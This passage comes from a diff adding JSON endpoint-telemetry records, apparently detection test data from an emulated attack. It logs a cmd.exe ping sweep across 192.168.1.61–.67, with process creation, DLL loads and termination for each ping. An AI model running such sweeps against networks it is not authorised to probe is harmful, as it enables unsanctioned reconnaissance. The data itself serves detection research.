"KernelBase.dll", 
+ "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "process", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572276830000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.61", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572276980000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "event_type": "process", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572281840000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.62", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572281980000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "event_type": "process", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572286990000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.63", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6236, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287140000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572287300000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "event_type": "process", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572291830000, + "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.64", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5388, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572291980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572291990000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "event_type": "process", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572296830000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.65", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4656, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572297020000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572296980000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "event_type": "process", + 
"pid": 4656, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572301840000, + "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.66", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7784, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572302020000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + 
"unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "process", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572306840000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.67", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4164, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572307020000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": 